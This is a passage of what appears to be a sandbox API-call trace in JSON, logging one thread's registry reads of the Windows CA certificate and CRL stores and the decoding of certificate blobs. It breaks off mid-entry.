"ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\CA\\PhysicalStores" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\CA\\PhysicalStores" + } + ], + "repeated": 0, + "id": 1157 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1158 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000510" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\CA" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\CA" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1159 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fa617", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000510" + } + ], + "repeated": 0, + "id": 1160 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1161 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000510" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\CA" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\CA" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1162 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000050c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000510" + }, + { + "name": "ObjectAttributesName", + "value": "" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\" + } + ], + "repeated": 0, + "id": 1163 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000518" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000050c" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1164 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000518" + }, + { + "name": "KeyInformation", + "value": "N+h%\\xffdf\\xffac\\xffd5\\x01\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00P\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1165 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000518" + }, + { + "name": "Index", + "value": "0" + } + ], + "repeated": 0, + "id": 1166 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000520" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000518" + }, + { + "name": "ObjectAttributesName", + "value": "109F1CAED645BB78B3EA2B94C0697C740733031C" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\109F1CAED645BB78B3EA2B94C0697C740733031C" + } + ], + "repeated": 0, + "id": 1167 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000520" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\109F1CAED645BB78B3EA2B94C0697C740733031C\\Blob" + } + ], + "repeated": 1, + "id": 1168 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000520" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x83\\xb6S\\x18fNo\\xa2E\\xe0\\xd7`\\x9f\\xb9X \\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x10\\x9f\\x1c\\xae\\xd6E\\xbbx\\xb3\\xea+\\x94\\xc0i|t\\x073\\x03\\x1c\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00&]\\x05\\x07\\xd8/\\xa2`\\x84\\xbd\\x83}\\xf5!\\x80\\xa7\\x05oZ\\x85 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x13\\x04\\x00\\x000\\x82\\x04\\x0f0\\x82\\x02\\xf7\\xa0\\x03\\x02\\x01\\x02\\x02\n\\x19\\x8b\\x11\\xd1?\\x9a\\x8f\\xfei\\xa00\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x000p1+0)\\x06\\x03U\\x04\\x0b\\x13\"Copyright (c) 1997 Microsoft Corp.1\\x1e0\\x1c\\x06\\x03U\\x04\\x0b\\x13\\x15Microsoft Corporation1!0\\x1f\\x06\\x03U\\x04\\x03\\x13\\x18Microsoft Root Authority0\\x1e\\x17\r971001070000Z\\x17\r021231070000Z0\\x81\\xc31+0)\\x06\\x03U\\x04\\x0b\\x13\"Copyright (c) 1997 Microsoft Corp.1A0?\\x06\\x03U\\x04\\x0b\\x138Microsoft Windows Hardware Compatibility Intermediate CA1\\x1e0\\x1c\\x06\\x03U\\x04\\x0b\\x13\\x15Microsoft Corporation110/\\x06\\x03U\\x04\\x03\\x13(Microsoft Windows Hardware Compatibility0\\x81\\x9f0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x01\\x05\\x00\\x03\\x81\\x8d\\x000\\x81" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\109F1CAED645BB78B3EA2B94C0697C740733031C\\Blob" + } + ], + "repeated": 0, + "id": 1169 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000520" + } + ], + "repeated": 0, + "id": 1170 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x767ef4e2", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x04\\x0f0\\x82\\x02\\xf7\\xa0\\x03\\x02\\x01\\x02\\x02\n\\x19\\x8b\\x11\\xd1?\\x9a\\x8f\\xfei\\xa00\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x000p1+0)\\x06\\x03U\\x04\\x0b\\x13\"Copyright (c) 1997 Microsoft Corp.1\\x1e0\\x1c\\x06\\x03U\\x04\\x0b\\x13\\x15Microsoft Corporation1!0\\x1f\\x06\\x03U\\x04\\x03\\x13\\x18Microsoft Root Authority0\\x1e\\x17\r971001070000Z\\x17\r021231070000Z0\\x81\\xc31+0)\\x06\\x03U\\x04\\x0b\\x13\"Copyright (c) 1997 Microsoft Corp.1A0?\\x06\\x03U\\x04\\x0b\\x138Microsoft W" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 1171 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000518" + }, + { + "name": "Index", + "value": "1" + } + ], + "repeated": 0, + "id": 1172 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000520" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000518" + }, + { + "name": "ObjectAttributesName", + "value": "D559A586669B08F46A30A133F8A9ED3D038E2EA8" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\D559A586669B08F46A30A133F8A9ED3D038E2EA8" + } + ], + "repeated": 0, + "id": 1173 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000520" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\D559A586669B08F46A30A133F8A9ED3D038E2EA8\\Blob" + } + ], + "repeated": 1, + "id": 1174 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000520" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xac\\xd8\\x0e\\xa2{\\xb7,\\xe7\\x00\\xdc\"rJ_\\x1e\\x92\\x0f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00Is\\xe0\\x92\\xcf\\x8a\\x9e,\\xa5\\xf9\\x88I:[\\xac\\xfe8\\x95\\x94.\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\n\\xcf\\xebK\\x07\\xe7\\x03\\xa0\\x1fL\\xef(\\xeerV\\xf7Qu\\x91U\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00n\\xd6\\xed}\\xf5/\\xc1\\x9b\\xdc\\x9e_\\xe9\\xe2\\xbe!\\xfb\\x18\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x91\\x16\\x1b\\x89K\\x11~\\xcd\\xc2Wb\\x8d\\xb4`\\xcc\\x04\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xd5Y\\xa5\\x86f\\x9b\\x08\\xf4j0\\xa13\\xf8\\xa9\\xed=\\x03\\x8e.\\xa8 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x87\\x03\\x00\\x000\\x82\\x03\\x830\\x82\\x02\\xec\\xa0\\x03\\x02\\x01\\x02\\x02\\x10F\\xfc\\xeb\\xba\\xb4\\xd0/\\x0f\\x92`\\x98#?\\x93\\x07\\x8f0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x000_1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x170\\x15\\x06\\x03U\\x04\n\\x13\\x0eVeriSign, Inc.1705\\x06\\x03U\\x04\\x0b\\x13.Class 3 Public Primary Certification Authority0\\x1e\\x17\r970417000000Z\\x17\r161024235959Z0\\x81\\xba1\\x1f0\\x1d\\x06\\x03U\\x04\n\\x13\\x16VeriSign Trust Network1\\x170\\x15\\x06\\x03U\\x04\\x0b\\x13\\x0eVeriSign, Inc.1301\\x06\\x03U\\x04\\x0b\\x13*VeriSign International Server CA - Class 31I0G\\x06\\x03U\\x04\\x0b\\x13@www.verisign.com/CPS" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\D559A586669B08F46A30A133F8A9ED3D038E2EA8\\Blob" + } + ], + "repeated": 0, + "id": 1175 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000520" + } + ], + "repeated": 0, + "id": 1176 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x767ef4e2", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x03\\x830\\x82\\x02\\xec\\xa0\\x03\\x02\\x01\\x02\\x02\\x10F\\xfc\\xeb\\xba\\xb4\\xd0/\\x0f\\x92`\\x98#?\\x93\\x07\\x8f0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x000_1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02US1\\x170\\x15\\x06\\x03U\\x04\n\\x13\\x0eVeriSign, Inc.1705\\x06\\x03U\\x04\\x0b\\x13.Class 3 Public Primary Certification Authority0\\x1e\\x17\r970417000000Z\\x17\r161024235959Z0\\x81\\xba1\\x1f0\\x1d\\x06\\x03U\\x04\n\\x13\\x16VeriSign Trust Network1\\x170\\x15\\x06\\x03U\\x04\\x0b\\x13\\x0eVeriSign, Inc.1301\\x06\\x03U\\x04\\x0b\\x13*VeriSign " + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 1177 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000518" + }, + { + "name": "Index", + "value": "2" + } + ], + "repeated": 0, + "id": 1178 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000520" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000518" + }, + { + "name": "ObjectAttributesName", + "value": "FEE449EE0E3965A5246F000E87FDE2A065FD89D4" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\FEE449EE0E3965A5246F000E87FDE2A065FD89D4" + } + ], + "repeated": 0, + "id": 1179 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000520" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\FEE449EE0E3965A5246F000E87FDE2A065FD89D4\\Blob" + } + ], + "repeated": 1, + "id": 1180 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000520" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xed\\xbc\\xcd\\xd5\\x10j\\x07\\x1c]\\x8bF\\x90\\x91\\x8eH\\xaa\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xfe\\xe4I\\xee\\x0e9e\\xa5$o\\x00\\x0e\\x87\\xfd\\xe2\\xa0e\\xfd\\x89\\xd4\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x9a\\xa6X\\x7f\\x94\\xdd\\x91\\xd9\\x1ec\\xdf\\xd3\\xf0\\xce_\\xae\\x18\\x93\\xaa\\xb7 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xce\\x01\\x00\\x000\\x82\\x01\\xca0\\x82\\x01t\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x067l\\x00\\xaa\\x00d\\x8a\\x11\\xcf\\xb8\\xd4\\xaa\\5\\xf40\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x000\\x161\\x140\\x12\\x06\\x03U\\x04\\x03\\x13\\x0bRoot Agency0\\x1e\\x17\r960528220259Z\\x17\r391231235959Z0\\x161\\x140\\x12\\x06\\x03U\\x04\\x03\\x13\\x0bRoot Agency0[0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x01\\x05\\x00\\x03J\\x000G\\x02@\\x81U\"\\xb9\\x8a\\xa4o\\xed\\xd6\\xe7\\xd9f\\x0fU\\xbc\\xd7\\xcd\\xd5\\xbcN@\\x02!\\xa2\\xb1\\xf7\\x870\\x85^\\xd2\\xf2D\\xb9\\xdc\\x9bu\\xb6\\xfbF_B\\xb6\\x9d#6\\x0b\\xdeT\\x0f\\xcd\\xbd\\x1f\\x99*\\x10X\\x11\\xcb@\\xcb\\xb5\\xa7A\\x02\\x03\\x01\\x00\\x01\\xa3\\x81\\x9e0\\x81\\x9b0P\\x06\\x03U\\x04\\x03\\x04I\\x13GFor Testing Purposes Only Sample Software Publishing Credentials Agency0G\\x06\\x03U\\x1d\\x01\\x04@0>\\x80\\x10\\x12\\xe4\t-\\x06\\x1d\\x1dO\\x00\\x8da!\\xdc\\x16dc\\xa1\\x180\\x161\\x140\\x12\\x06\\x03U\\x04\\x03\\x13\\x0bRoot Agency\\x82\\x10\\x067l\\x00\\xaa\\x00d\\x8a\\x11\\xcf\\xb8\\xd4\\xaa\\5\\xf40\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x00\\x03A\\x00-.>{\\x89B\\x89?\\xa8!" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\FEE449EE0E3965A5246F000E87FDE2A065FD89D4\\Blob" + } + ], + "repeated": 0, + "id": 1181 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f2b77", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000520" + } + ], + "repeated": 0, + "id": 1182 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x767f770e", + "parentcaller": "0x767ef4e2", + "category": "crypto", + "api": "CryptDecodeObjectEx", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "CertEncodingType", + "value": "0x00000001" + }, + { + "name": "Encoded", + "value": "0\\x82\\x01\\xca0\\x82\\x01t\\xa0\\x03\\x02\\x01\\x02\\x02\\x10\\x067l\\x00\\xaa\\x00d\\x8a\\x11\\xcf\\xb8\\xd4\\xaa\\5\\xf40\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x000\\x161\\x140\\x12\\x06\\x03U\\x04\\x03\\x13\\x0bRoot Agency0\\x1e\\x17\r960528220259Z\\x17\r391231235959Z0\\x161\\x140\\x12\\x06\\x03U\\x04\\x03\\x13\\x0bRoot Agency0[0\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x01\\x05\\x00\\x03J\\x000G\\x02@\\x81U\"\\xb9\\x8a\\xa4o\\xed\\xd6\\xe7\\xd9f\\x0fU\\xbc\\xd7\\xcd\\xd5\\xbcN@\\x02!\\xa2\\xb1\\xf7\\x870\\x85^\\xd2\\xf2D\\xb9\\xdc\\x9bu\\xb6\\xfbF_B\\xb6\\x9d#6\\x0b\\xdeT\\x0f\\xcd\\xbd\\x1f\\x99*\\x10X\\x11\\xcb@\\xcb\\xb5\\xa7A\\x02\\x03\\x01\\x00\\x01\\xa3\\x81\\x9e0\\x81\\x9b0P\\x06\\x03U\\x04\\x03\\x04I\\x13GFor Testing Purposes" + }, + { + "name": "Flags", + "value": "0x00008005" + } + ], + "repeated": 0, + "id": 1183 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000518" + } + ], + "repeated": 0, + "id": 1184 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000518" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000050c" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\CRLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1185 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000518" + }, + { + "name": "KeyInformation", + "value": "N+h%\\xffdf\\xffac\\xffd5\\x01\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00P\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1186 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000518" + }, + { + "name": "Index", + "value": "0" + } + ], + "repeated": 0, + "id": 1187 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000524" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000518" + }, + { + "name": "ObjectAttributesName", + "value": "A377D1B1C0538833035211F4083D00FECC414DAB" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\CRLs\\A377D1B1C0538833035211F4083D00FECC414DAB" + } + ], + "repeated": 0, + "id": 1188 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000524" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\CRLs\\A377D1B1C0538833035211F4083D00FECC414DAB\\Blob" + } + ], + "repeated": 1, + "id": 1189 + }, + { + "timestamp": "2025-03-07 21:41:29,671", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000524" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": 